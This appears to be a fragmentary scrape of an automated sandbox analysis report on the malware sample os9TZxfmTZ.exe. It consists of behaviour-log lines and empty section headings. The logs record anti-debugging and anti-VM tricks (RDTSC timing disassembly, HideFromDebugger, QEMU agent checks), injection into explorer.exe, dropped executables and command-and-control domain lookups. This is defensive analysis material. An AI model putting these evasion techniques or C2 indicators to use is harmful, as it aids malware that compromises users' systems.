Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\spoolsv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\spoolsv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\spoolsv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\spoolsv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\spoolsv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\spoolsv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System\spoolsv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System\explorer.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\Desktop\os9tzxfmtz.exe	RDTSC instruction interceptor: First address: 000000000228872E second address: 00000000022887E6 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a xor edi, edi 0x0000000c cmp bh, bh 0x0000000e mov dword ptr [ebp+000000F8h], 00A95F60h 0x00000018 test dx, dx 0x0000001b test eax, edx 0x0000001d call 00007F6704C9B653h 0x00000022 call 00007F6704C9B5D8h 0x00000027 lfence 0x0000002a mov edx, dword ptr [7FFE0014h] 0x00000030 lfence 0x00000033 ret 0x00000034 mov esi, edx 0x00000036 pushad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	RDTSC instruction interceptor: First address: 00000000022887E6 second address: 00000000022887E6 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F6704CA1D08h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d jmp 00007F6704CA1D2Eh 0x0000001f cmp bl, 0000006Dh 0x00000022 add edi, edx 0x00000024 dec dword ptr [ebp+000000F8h] 0x0000002a cmp dword ptr [ebp+000000F8h], 00000000h 0x00000031 jne 00007F6704CA1CB9h 0x00000033 test eax, edx 0x00000035 call 00007F6704CA1D93h 0x0000003a call 00007F6704CA1D18h 0x0000003f lfence 0x00000042 mov edx, dword ptr [7FFE0014h] 0x00000048 lfence 0x0000004b ret 0x0000004c mov esi, edx 0x0000004e pushad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	RDTSC instruction interceptor: First address: 0000000002280C26 second address: 0000000002280C26 instructions:
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	RDTSC instruction interceptor: First address: 0000000002283F33 second address: 0000000002283F33 instructions:
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	RDTSC instruction interceptor: First address: 0000000002283FF5 second address: 0000000002283FF5 instructions:

Source: C:\Users\user\Desktop\os9tzxfmtz.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	File opened: C:\Program Files\qga\qga.exe

Source: C:\Windows\System\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\mrsys.exe			Jump to dropped file
Source: C:\Windows\System\svchost.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\stsys.exe			Jump to dropped file

Analysis Report os9TZxfmTZ.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Source: C:\Users\user\Desktop\os9TZxfmTZ.exe TID: 6252	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Windows\System\explorer.exe TID: 6388	Thread sleep count: 151 > 30	Jump to behavior
Source: C:\Windows\System\svchost.exe TID: 6444	Thread sleep count: 489 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6656	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: svchost.exe, 00000007.00000002.499902779.0000017AF2861000.00000004.00000001.sdmp	Binary or memory string: "@Hyper-V RAW
Source: at.exe, 00000009.00000002.271752849.0000000003390000.00000002.00000001.sdmp, at.exe, 0000000B.00000002.273246239.00000000036F0000.00000002.00000001.sdmp, at.exe, 0000000D.00000002.275410205.0000000003520000.00000002.00000001.sdmp, at.exe, 0000000F.00000002.276667282.0000000002B90000.00000002.00000001.sdmp, at.exe, 00000011.00000002.278275382.0000000002900000.00000002.00000001.sdmp, at.exe, 00000013.00000002.280308756.0000000003130000.00000002.00000001.sdmp, at.exe, 00000015.00000002.280430889.00000000037C0000.00000002.00000001.sdmp, at.exe, 00000017.00000002.281374213.00000000033E0000.00000002.00000001.sdmp, at.exe, 0000001A.00000002.283647922.0000000002830000.00000002.00000001.sdmp, at.exe, 0000001E.00000002.284905605.0000000003580000.00000002.00000001.sdmp, at.exe, 00000020.00000002.287265699.0000000002F30000.00000002.00000001.sdmp, svchost.exe, 00000021.00000002.497133246.00000240A2B40000.00000002.00000001.sdmp, at.exe, 00000023.00000002.288280375.00000000028B0000.00000002.00000001.sdmp, at.exe, 00000025.00000002.289269510.00000000029A0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000004.00000002.367343924.00000000007E8000.00000004.00000020.sdmp, svchost.exe, 00000007.00000002.499878626.0000017AF284E000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000019.00000002.494012893.000002A269202000.00000004.00000001.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: explorer.exe, 00000004.00000002.367258347.00000000007A1000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWH
Source: at.exe, 00000009.00000002.271752849.0000000003390000.00000002.00000001.sdmp, at.exe, 0000000B.00000002.273246239.00000000036F0000.00000002.00000001.sdmp, at.exe, 0000000D.00000002.275410205.0000000003520000.00000002.00000001.sdmp, at.exe, 0000000F.00000002.276667282.0000000002B90000.00000002.00000001.sdmp, at.exe, 00000011.00000002.278275382.0000000002900000.00000002.00000001.sdmp, at.exe, 00000013.00000002.280308756.0000000003130000.00000002.00000001.sdmp, at.exe, 00000015.00000002.280430889.00000000037C0000.00000002.00000001.sdmp, at.exe, 00000017.00000002.281374213.00000000033E0000.00000002.00000001.sdmp, at.exe, 0000001A.00000002.283647922.0000000002830000.00000002.00000001.sdmp, at.exe, 0000001E.00000002.284905605.0000000003580000.00000002.00000001.sdmp, at.exe, 00000020.00000002.287265699.0000000002F30000.00000002.00000001.sdmp, svchost.exe, 00000021.00000002.497133246.00000240A2B40000.00000002.00000001.sdmp, at.exe, 00000023.00000002.288280375.00000000028B0000.00000002.00000001.sdmp, at.exe, 00000025.00000002.289269510.00000000029A0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: os9tzxfmtz.exe	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: at.exe, 00000009.00000002.271752849.0000000003390000.00000002.00000001.sdmp, at.exe, 0000000B.00000002.273246239.00000000036F0000.00000002.00000001.sdmp, at.exe, 0000000D.00000002.275410205.0000000003520000.00000002.00000001.sdmp, at.exe, 0000000F.00000002.276667282.0000000002B90000.00000002.00000001.sdmp, at.exe, 00000011.00000002.278275382.0000000002900000.00000002.00000001.sdmp, at.exe, 00000013.00000002.280308756.0000000003130000.00000002.00000001.sdmp, at.exe, 00000015.00000002.280430889.00000000037C0000.00000002.00000001.sdmp, at.exe, 00000017.00000002.281374213.00000000033E0000.00000002.00000001.sdmp, at.exe, 0000001A.00000002.283647922.0000000002830000.00000002.00000001.sdmp, at.exe, 0000001E.00000002.284905605.0000000003580000.00000002.00000001.sdmp, at.exe, 00000020.00000002.287265699.0000000002F30000.00000002.00000001.sdmp, svchost.exe, 00000021.00000002.497133246.00000240A2B40000.00000002.00000001.sdmp, at.exe, 00000023.00000002.288280375.00000000028B0000.00000002.00000001.sdmp, at.exe, 00000025.00000002.289269510.00000000029A0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: svchost.exe, 00000019.00000002.494093401.000002A269228000.00000004.00000001.sdmp, svchost.exe, 00000021.00000002.493270876.00000240A1E40000.00000004.00000001.sdmp, svchost.exe, 00000027.00000002.493190369.000001E1C2829000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: at.exe, 00000009.00000002.271752849.0000000003390000.00000002.00000001.sdmp, at.exe, 0000000B.00000002.273246239.00000000036F0000.00000002.00000001.sdmp, at.exe, 0000000D.00000002.275410205.0000000003520000.00000002.00000001.sdmp, at.exe, 0000000F.00000002.276667282.0000000002B90000.00000002.00000001.sdmp, at.exe, 00000011.00000002.278275382.0000000002900000.00000002.00000001.sdmp, at.exe, 00000013.00000002.280308756.0000000003130000.00000002.00000001.sdmp, at.exe, 00000015.00000002.280430889.00000000037C0000.00000002.00000001.sdmp, at.exe, 00000017.00000002.281374213.00000000033E0000.00000002.00000001.sdmp, at.exe, 0000001A.00000002.283647922.0000000002830000.00000002.00000001.sdmp, at.exe, 0000001E.00000002.284905605.0000000003580000.00000002.00000001.sdmp, at.exe, 00000020.00000002.287265699.0000000002F30000.00000002.00000001.sdmp, svchost.exe, 00000021.00000002.497133246.00000240A2B40000.00000002.00000001.sdmp, at.exe, 00000023.00000002.288280375.00000000028B0000.00000002.00000001.sdmp, at.exe, 00000025.00000002.289269510.00000000029A0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Thread information set: HideFromDebugger

Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Process queried: DebugPort
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Process queried: DebugPort

Source: C:\Windows\System\explorer.exe	Domain query: vccmd01.googlecode.com
Source: C:\Windows\System\explorer.exe	Domain query: vccmd02.googlecode.com
Source: C:\Windows\System\explorer.exe	Network Connect: 74.125.143.82 80	Jump to behavior
Source: C:\Windows\System\explorer.exe	Domain query: vccmd01.zxq.net
Source: C:\Windows\System\explorer.exe	Domain query: vccmd03.googlecode.com
Source: C:\Windows\System\explorer.exe	Domain query: vccmd01.t35.com

Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Section loaded: unknown target: C:\Windows\System\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Section loaded: unknown target: unknown protection: execute and read and write

Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Process created: C:\Users\user\Desktop\os9tzxfmtz.exe c:\users\user\desktop\os9tzxfmtz.exe			Jump to behavior
Source: C:\Windows\System\explorer.exe	Process created: unknown unknown			Jump to behavior

Source: os9tzxfmtz.exe , 0000001D.00000002.353878128.000000001E6B0000.00000040.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: os9tzxfmtz.exe , 0000001D.00000002.353878128.000000001E6B0000.00000040.00000001.sdmp	Binary or memory string: Microsoft-Reserved-24C26ACC-DE62-4303-88AD-6CD4F1447F18SecurityConfigureWindowsPasswordsProxy DesktopProgmanSoftware\Microsoft\Windows NT\CurrentVersion\WinlogonShellSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells\AvailableShells
Source: explorer.exe, 00000004.00000002.367234221.0000000000783000.00000004.00000020.sdmp	Binary or memory string: Program ManagerW64\at.exexe

Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior